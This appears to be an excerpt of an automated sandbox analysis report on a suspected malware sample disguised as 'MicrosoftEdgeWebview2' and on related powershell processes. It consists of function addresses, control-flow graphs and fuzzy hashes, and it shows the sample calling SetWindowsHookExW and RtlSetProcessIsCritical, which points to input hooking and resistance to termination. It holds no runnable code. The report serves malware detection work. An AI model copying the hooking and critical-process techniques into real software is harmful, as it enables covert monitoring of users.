              execution_graph 4175 7ffd9b6d2e58 4178 7ffd9b6d2e61 SetWindowsHookExW 4175->4178 4177 7ffd9b6d2f31 4178->4177 4179 7ffd9b6d290d 4180 7ffd9b6d293f RtlSetProcessIsCritical 4179->4180 4182 7ffd9b6d29f2 4180->4182

              Executed Functions

              Function 00007FFD9B6D12B9 Relevance: 2.1, Strings: 1, Instructions: 808COMMON
              Download Yara Rule

              Control-flow Graph

              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID: CAM_^
              • API String ID: 0-3136481660
              • Opcode ID: 5d4a6cec4192fc7d71674e47685700370935643d1236e722b4bab410bc47a8d5
              • Instruction ID: 742938695245372f865bd3ff9ca56fac162cd50ad9ffaa4bd3764d25f2f8ad76
              • Opcode Fuzzy Hash: 5d4a6cec4192fc7d71674e47685700370935643d1236e722b4bab410bc47a8d5
              • Instruction Fuzzy Hash: 4942D631B19A4D4FE7A8EB788876AB977D2FF98300F440579E41EC72D6DE28B9018741
              Function 00007FFD9B6D90D6 Relevance: .5, Instructions: 471COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 347 7ffd9b6d90d6-7ffd9b6d90e3 348 7ffd9b6d90e5-7ffd9b6d90ed 347->348 349 7ffd9b6d90ee-7ffd9b6d91b7 347->349 348->349 354 7ffd9b6d91b9-7ffd9b6d91c2 349->354 355 7ffd9b6d9223 349->355 354->355 357 7ffd9b6d91c4-7ffd9b6d91d0 354->357 356 7ffd9b6d9225-7ffd9b6d924a 355->356 364 7ffd9b6d924c-7ffd9b6d9255 356->364 365 7ffd9b6d92b6 356->365 358 7ffd9b6d9209-7ffd9b6d9221 357->358 359 7ffd9b6d91d2-7ffd9b6d91e4 357->359 358->356 361 7ffd9b6d91e6 359->361 362 7ffd9b6d91e8-7ffd9b6d91fb 359->362 361->362 362->362 363 7ffd9b6d91fd-7ffd9b6d9205 362->363 363->358 364->365 366 7ffd9b6d9257-7ffd9b6d9263 364->366 367 7ffd9b6d92b8-7ffd9b6d9360 365->367 368 7ffd9b6d929c-7ffd9b6d92b4 366->368 369 7ffd9b6d9265-7ffd9b6d9277 366->369 378 7ffd9b6d9362-7ffd9b6d936c 367->378 379 7ffd9b6d93ce 367->379 368->367 371 7ffd9b6d9279 369->371 372 7ffd9b6d927b-7ffd9b6d928e 369->372 371->372 372->372 374 7ffd9b6d9290-7ffd9b6d9298 372->374 374->368 378->379 380 7ffd9b6d936e-7ffd9b6d937b 378->380 381 7ffd9b6d93d0-7ffd9b6d93f9 379->381 382 7ffd9b6d93b4-7ffd9b6d93cc 380->382 383 7ffd9b6d937d-7ffd9b6d938f 380->383 387 7ffd9b6d93fb-7ffd9b6d9406 381->387 388 7ffd9b6d9463 381->388 382->381 385 7ffd9b6d9391 383->385 386 7ffd9b6d9393-7ffd9b6d93a6 383->386 385->386 386->386 389 7ffd9b6d93a8-7ffd9b6d93b0 386->389 387->388 390 7ffd9b6d9408-7ffd9b6d9416 387->390 391 7ffd9b6d9465-7ffd9b6d94f6 388->391 389->382 392 7ffd9b6d9418-7ffd9b6d942a 390->392 393 7ffd9b6d944f-7ffd9b6d9461 390->393 399 7ffd9b6d94fc-7ffd9b6d950b 391->399 394 7ffd9b6d942c 392->394 395 7ffd9b6d942e-7ffd9b6d9441 392->395 393->391 394->395 395->395 397 7ffd9b6d9443-7ffd9b6d944b 395->397 397->393 400 7ffd9b6d9513-7ffd9b6d9578 call 7ffd9b6d9594 399->400 401 7ffd9b6d950d 399->401 409 7ffd9b6d957a 400->409 410 7ffd9b6d957f-7ffd9b6d9593 400->410 401->400 409->410
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d59e849418843406f266aaee37fd2aa9af29c490897cdd93222e6a84c8752a2b
              • Instruction ID: 912170421a648166c20c20b6fd29fb34fe472fcffe3776f61129d346c64b3947
              • Opcode Fuzzy Hash: d59e849418843406f266aaee37fd2aa9af29c490897cdd93222e6a84c8752a2b
              • Instruction Fuzzy Hash: FEF19430A19A8D8FEBA8DF28CC597E937D1FF95310F04426AE85DC72D5DB34A9418B81
              Function 00007FFD9B6D9E82 Relevance: .5, Instructions: 457COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 411 7ffd9b6d9e82-7ffd9b6d9e8f 412 7ffd9b6d9e9a-7ffd9b6d9f67 411->412 413 7ffd9b6d9e91-7ffd9b6d9e99 411->413 418 7ffd9b6d9f69-7ffd9b6d9f72 412->418 419 7ffd9b6d9fd3 412->419 413->412 418->419 421 7ffd9b6d9f74-7ffd9b6d9f80 418->421 420 7ffd9b6d9fd5-7ffd9b6d9ffa 419->420 427 7ffd9b6d9ffc-7ffd9b6da005 420->427 428 7ffd9b6da066 420->428 422 7ffd9b6d9fb9-7ffd9b6d9fd1 421->422 423 7ffd9b6d9f82-7ffd9b6d9f94 421->423 422->420 425 7ffd9b6d9f96 423->425 426 7ffd9b6d9f98-7ffd9b6d9fab 423->426 425->426 426->426 429 7ffd9b6d9fad-7ffd9b6d9fb5 426->429 427->428 430 7ffd9b6da007-7ffd9b6da013 427->430 431 7ffd9b6da068-7ffd9b6da08d 428->431 429->422 432 7ffd9b6da04c-7ffd9b6da064 430->432 433 7ffd9b6da015-7ffd9b6da027 430->433 438 7ffd9b6da0fb 431->438 439 7ffd9b6da08f-7ffd9b6da099 431->439 432->431 434 7ffd9b6da029 433->434 435 7ffd9b6da02b-7ffd9b6da03e 433->435 434->435 435->435 437 7ffd9b6da040-7ffd9b6da048 435->437 437->432 440 7ffd9b6da0fd-7ffd9b6da12b 438->440 439->438 441 7ffd9b6da09b-7ffd9b6da0a8 439->441 448 7ffd9b6da19b 440->448 449 7ffd9b6da12d-7ffd9b6da138 440->449 442 7ffd9b6da0aa-7ffd9b6da0bc 441->442 443 7ffd9b6da0e1-7ffd9b6da0f9 441->443 444 7ffd9b6da0be 442->444 445 7ffd9b6da0c0-7ffd9b6da0d3 442->445 443->440 444->445 445->445 447 7ffd9b6da0d5-7ffd9b6da0dd 445->447 447->443 450 7ffd9b6da19d-7ffd9b6da275 448->450 449->448 451 7ffd9b6da13a-7ffd9b6da148 449->451 461 7ffd9b6da27b-7ffd9b6da28a 450->461 452 7ffd9b6da14a-7ffd9b6da15c 451->452 453 7ffd9b6da181-7ffd9b6da199 451->453 455 7ffd9b6da15e 452->455 456 7ffd9b6da160-7ffd9b6da173 452->456 453->450 455->456 456->456 458 7ffd9b6da175-7ffd9b6da17d 456->458 458->453 462 7ffd9b6da28c 461->462 463 7ffd9b6da292-7ffd9b6da2f4 call 7ffd9b6da310 461->463 462->463 471 7ffd9b6da2fb-7ffd9b6da30f 463->471 472 7ffd9b6da2f6 463->472 472->471
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46883effe899b06bab4aff86d38741991b13acf0dfece6966aa196bec12566cd
              • Instruction ID: e6a0f111735260e62ed94bd5631d892dac468fbddd36c6be498fb3b83079cc57
              • Opcode Fuzzy Hash: 46883effe899b06bab4aff86d38741991b13acf0dfece6966aa196bec12566cd
              • Instruction Fuzzy Hash: 4DE1B230A0DA4D8FEBA8DF28CC657E977D1FB95310F04826ED85DC7295DE74A9808B81
              Function 00007FFD9B6D0EF0 Relevance: .3, Instructions: 309COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2cbe38d0c0249377a907932814ea866782218969e8ab90f6eef66429d565a35a
              • Instruction ID: 1317ceff7520a40090ac761716204bbee304aeff766f1d06cf3a1fc6d2316d99
              • Opcode Fuzzy Hash: 2cbe38d0c0249377a907932814ea866782218969e8ab90f6eef66429d565a35a
              • Instruction Fuzzy Hash: 85912B62B1EA4D0FE7649F6C8CB96B937C1FF99740F05067DD459CB2E2DE18B9018281
              Function 00007FFD9B6D1C4D Relevance: .2, Instructions: 199COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31c70019bd5af427d734c36e24a8ef2ef3aa21208debe9fa19ccdc6480f2a24f
              • Instruction ID: 0ded79d36f6159772e8f0f347bfa40929dde7909f157398c2decf7c8c25a32fc
              • Opcode Fuzzy Hash: 31c70019bd5af427d734c36e24a8ef2ef3aa21208debe9fa19ccdc6480f2a24f
              • Instruction Fuzzy Hash: B551D021B0E6C90FE79AABB848756757FE1DF87215B0801FAE09DCB1E7DD486806C342
              Function 00007FFD9B6D290D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 183 7ffd9b6d290d-7ffd9b6d29f0 RtlSetProcessIsCritical 187 7ffd9b6d29f8-7ffd9b6d2a2d 183->187 188 7ffd9b6d29f2 183->188 188->187
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID: CriticalProcess
              • String ID:
              • API String ID: 2695349919-0
              • Opcode ID: 386fd86b7b75fc6d72f4c468f58efd54d9af39b729b48b28106fdc90a2ffbb8a
              • Instruction ID: dc8e7c2b9f7378dc33c4e718ce97408a5d07ce11d2469590a0511dbfea153264
              • Opcode Fuzzy Hash: 386fd86b7b75fc6d72f4c468f58efd54d9af39b729b48b28106fdc90a2ffbb8a
              • Instruction Fuzzy Hash: 6041E33190C6488FD718DFA8D855BE9BBF0FF56311F04416FE09AC7692CB646846CB91
              Function 00007FFD9B6D2E58 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 190 7ffd9b6d2e58-7ffd9b6d2e5f 191 7ffd9b6d2e6a-7ffd9b6d2edd 190->191 192 7ffd9b6d2e61-7ffd9b6d2e69 190->192 196 7ffd9b6d2f69-7ffd9b6d2f6d 191->196 197 7ffd9b6d2ee3-7ffd9b6d2ee8 191->197 192->191 198 7ffd9b6d2ef2-7ffd9b6d2f2f SetWindowsHookExW 196->198 201 7ffd9b6d2eef-7ffd9b6d2ef0 197->201 199 7ffd9b6d2f37-7ffd9b6d2f68 198->199 200 7ffd9b6d2f31 198->200 200->199 201->198
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2962720771.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ffd9b6d0000_MicrosoftEdgeWebview2.jbxd
              Similarity
              • API ID: HookWindows
              • String ID:
              • API String ID: 2559412058-0
              • Opcode ID: 270d64c5623fe875af84244b609f9a7447b7ca1ea672827cf9dc62121733c5a5
              • Instruction ID: b020915d214fa010e840a32324c0e3fc060515883f2eb1d82f962023bdabe12b
              • Opcode Fuzzy Hash: 270d64c5623fe875af84244b609f9a7447b7ca1ea672827cf9dc62121733c5a5
              • Instruction Fuzzy Hash: 7D41F330E1CA4C4FDB58DBA8D8566F9BBE1EB99321F00427ED059C3292CA64A81287C1

              Executed Functions

              Function 00007FFD9B7B6660 Relevance: .4, Instructions: 402COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62eae987bbdc690ec91791d528152765146bbe444a1f11bc6ca2a69a7bb7f42e
              • Instruction ID: 1d2cbea2e68ff67ca297e39c91b9bff9539b555f3e784affa52bbbd95838067a
              • Opcode Fuzzy Hash: 62eae987bbdc690ec91791d528152765146bbe444a1f11bc6ca2a69a7bb7f42e
              • Instruction Fuzzy Hash: A7C16772B0FB9E4FEB64AAA848655B9BBD0EF55314B0402BED55DC70F3DA18ED008B41
              Function 00007FFD9B6E9758 Relevance: .1, Instructions: 130COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 919a62e9b00c1869a41b27643e3a70de91c9b9f5758462ea9670b6477a4f3380
              • Instruction ID: 32085953041aa6737cf9c9fc13d3f641fb1b42e349f745edc82b2a5ad42de9ce
              • Opcode Fuzzy Hash: 919a62e9b00c1869a41b27643e3a70de91c9b9f5758462ea9670b6477a4f3380
              • Instruction Fuzzy Hash: DD31F971A1CB4C8FDB589F5C984A6A977E0FB99310F00412FE449D3292DB30B915CBC2
              Function 00007FFD9B5CE380 Relevance: .1, Instructions: 126COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1758512600.00007FFD9B5CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5CD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b5cd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a22a53c60f617a6ceffaf5ea7a614785cbd138539e139ebbfde3c255edf2038e
              • Instruction ID: 6878243793a124cbdce86e761d71bc30e3ad9f6b3ce829adfced5a5c1e5dd6c8
              • Opcode Fuzzy Hash: a22a53c60f617a6ceffaf5ea7a614785cbd138539e139ebbfde3c255edf2038e
              • Instruction Fuzzy Hash: 56414B7140EBC44FD7679B2898559623FF1EF52320B1646EFD088CB1A3D625F846C792
              Function 00007FFD9B6EA62C Relevance: .1, Instructions: 100COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4e3ac8908a30d30492e3087ab01c87ee2c907e1d347895c9b9f7d49f3b0471ff
              • Instruction ID: c23d0c4a1e1f5940419f657195145af9dc4f7b05e45a3b15fa8a69b7d196b8df
              • Opcode Fuzzy Hash: 4e3ac8908a30d30492e3087ab01c87ee2c907e1d347895c9b9f7d49f3b0471ff
              • Instruction Fuzzy Hash: D421F83190C74C4FDB59DFAC984A7E97BF0EBA6321F04416BD049C7152CA74A41ACB91
              Function 00007FFD9B6E33B5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
              • Instruction ID: 22b824bd88e2b6d48dd14a292a13bac9666b236c475e49cbd940d246467ebbe2
              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
              • Instruction Fuzzy Hash: F401A73020CB0C4FD748EF0CE051AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
              Function 00007FFD9B7B414D Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a734f351b205bcdf5a1f3d48d66ae210a9f5d4f2cf6b68fb14088438301f8c86
              • Instruction ID: 080743534fa19e95236cb188e9c83a5075b740dff5686f517874d8e479fda579
              • Opcode Fuzzy Hash: a734f351b205bcdf5a1f3d48d66ae210a9f5d4f2cf6b68fb14088438301f8c86
              • Instruction Fuzzy Hash: 2AF0BE32B0E6498FD769EA8CE4558A873E0EF55320B1600BAE06DC71B3CA25EC40CB45
              Function 00007FFD9B7B4400 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0ce8b8661839b5ceef80a66c0bee97d682b1e95622006f93ee3a5459ee7a3316
              • Instruction ID: a12d77880c4913e9036b2c2c587c7f2558c83b239aece8234214539db92b1fe6
              • Opcode Fuzzy Hash: 0ce8b8661839b5ceef80a66c0bee97d682b1e95622006f93ee3a5459ee7a3316
              • Instruction Fuzzy Hash: 59F0BE32A0E6498FDB68EA4CE4648A8B7E0FF0532074600BAE05DC70B3CA25AC50CB40
              Function 00007FFD9B7B41D1 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1759203410.00007FFD9B7B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b7b0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: d2fdef9f9d8698a3263587d2135c568bf769876d187644258486c0ea47f6f652
              • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction Fuzzy Hash: 5EE01A31B0C91C9FDA78DA4CE0559A973E1EB98321B1202BBD14EC7571CA22ED518F81
              Function 00007FFD9B6EA2AC Relevance: .0, Instructions: 24COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
              • Instruction ID: f0afa1b50100a7561f4a67eef4b7d96d9ba89fcabe09da6dfc75c24aafefb342
              • Opcode Fuzzy Hash: c49449d2ac0313692a40979fe80b4a1ee3da1bfde7ffe00faa70c4389504a3a1
              • Instruction Fuzzy Hash: CEE04F35804A4C8FDF54EF18C8594E97BE0FF68301B05029BE81DC7120DB71AA58CBC2

              Non-executed Functions

              Function 00007FFD9B6E8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1758865250.00007FFD9B6E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6E0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_7ffd9b6e0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID: K_^4$K_^7$K_^F$K_^J
              • API String ID: 0-377281160
              • Opcode ID: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
              • Instruction ID: 5864d6876c9b656f1fec18a6d9a796d8377cae410ee11958dee8b4d29452c290
              • Opcode Fuzzy Hash: 4bcb7626cc64b94c55d6df8f3314fc61f7497ef9aa3022dd500b8fbce610da28
              • Instruction Fuzzy Hash: B221F6B77085265ED7057B7DB8549DA3BA0DF9827438542F3D1A9CF093EE1470868AD0

              Executed Functions

              Function 00007FFD9B7A6660 Relevance: .4, Instructions: 402COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 551646da129ecf417dcdf504edf4304fa72307ce34b98e6873b41d4c255c773d
              • Instruction ID: efab48053a2a3b27eff950bc3d9e636c7d823ad37128dec4c83745cfa6f4e239
              • Opcode Fuzzy Hash: 551646da129ecf417dcdf504edf4304fa72307ce34b98e6873b41d4c255c773d
              • Instruction Fuzzy Hash: 6FC14872B1FB8E4FEBA5ABA848655B9BBD1EF55310B0502BED45DC70F3DA18E9008341
              Function 00007FFD9B6D9750 Relevance: .1, Instructions: 146COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81cf1c36e49e3d54de58b94aece50726699f246ec0ccb341ae10c0d1d0751696
              • Instruction ID: 778c20e8df5794df75784c7039aa55601ac9a67e09162ae01404d1445ba68f9a
              • Opcode Fuzzy Hash: 81cf1c36e49e3d54de58b94aece50726699f246ec0ccb341ae10c0d1d0751696
              • Instruction Fuzzy Hash: 95412971A0DB888FDB18DF5C9C1A6A87FE0FB95310F04426FD499C7192DA20B815CBC2
              Function 00007FFD9B5BEB80 Relevance: .1, Instructions: 127COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1857443692.00007FFD9B5BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B5BD000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b5bd000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8724d8deecaa35d3e68d255ec1acda26dc875d56f8f1957a9ad6cebc53dbb2f5
              • Instruction ID: b895d10c67169fab0472804ea25a6f6ea510afb6c062f02e032dcbead91d1528
              • Opcode Fuzzy Hash: 8724d8deecaa35d3e68d255ec1acda26dc875d56f8f1957a9ad6cebc53dbb2f5
              • Instruction Fuzzy Hash: 76413E7140EBC44FE7978B3898519623FF0FF56324B1905DFD089CB1A3D625A846CB92
              Function 00007FFD9B6DA49C Relevance: .1, Instructions: 103COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7d98cce31b6ee0988941645864e4a86c8a845b7d928a89e262fc81b035a1df0
              • Instruction ID: ddbaeea1e075a52b47425bf0dd2d90eae4f1f66b774e8e157ce8c4ebd27347c1
              • Opcode Fuzzy Hash: e7d98cce31b6ee0988941645864e4a86c8a845b7d928a89e262fc81b035a1df0
              • Instruction Fuzzy Hash: 3221283190CB4C4FDB59DBAC9C4A7E97BF0EB96320F04826BD049C7152DA74A816CB91
              Function 00007FFD9B6D33B5 Relevance: .0, Instructions: 49COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction ID: 0c6d2c360707e00c7e88e4e6656347cd16ed5dd2fb8571ff3f9b6faa4a7628a3
              • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
              • Instruction Fuzzy Hash: A301A73020CB0C4FD748EF0CE451AA6B3E0FB85364F10056EE58AC36A1DA32E882CB41
              Function 00007FFD9B6DA0FB Relevance: .0, Instructions: 41COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858119594.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b6d0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 431c5a6b7b22a692d4f14543591fdb70d9b12c8d8bb0e076c5b7245d90daf50d
              • Instruction ID: c263755d94cb2424dfe9528d670569d7a6f0261367bc15ac03c105d370531107
              • Opcode Fuzzy Hash: 431c5a6b7b22a692d4f14543591fdb70d9b12c8d8bb0e076c5b7245d90daf50d
              • Instruction Fuzzy Hash: FDF02B3661EA8C4FDB91DF2C9C690E47FA0FFB6201B0502BBD558CB161DB219908C7C2
              Function 00007FFD9B7A414D Relevance: .0, Instructions: 37COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e08e0800ae08f47550bd357fdc78e4d2a47e1ec82bde4bb419d39a0c662a3f87
              • Instruction ID: 249a53cfeea5a5710772d72aac8da8857288eb759fae4957ca314217e47ff183
              • Opcode Fuzzy Hash: e08e0800ae08f47550bd357fdc78e4d2a47e1ec82bde4bb419d39a0c662a3f87
              • Instruction Fuzzy Hash: 10F0BE32B0E6498FD7A9EA8CE4518A877E0EF55320B1600BAE06DC71B3CA26EC40C745
              Function 00007FFD9B7A4400 Relevance: .0, Instructions: 35COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb6ff3db79ea7d1ffc20fe143ae744ee26f26c9da3615d1d2cbd515a01255768
              • Instruction ID: 3db109a99dd4d81cb40f9ae75e0641eaabcefdb6057fe40abc5ea5bf6746e43f
              • Opcode Fuzzy Hash: eb6ff3db79ea7d1ffc20fe143ae744ee26f26c9da3615d1d2cbd515a01255768
              • Instruction Fuzzy Hash: 5AF05E32A0E6498FD7A9EA5CE4658A8B7E4FF4532075600BAE15DC74B3DA26AC40C750
              Function 00007FFD9B7A41D1 Relevance: .0, Instructions: 29COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.1858858877.00007FFD9B7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7A0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_7ffd9b7a0000_powershell.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
              • Instruction ID: d20cdf9936b2dfc4e0020c17d8187e0ca91556ee5f6b31774fb9f5d0e77ecf9e
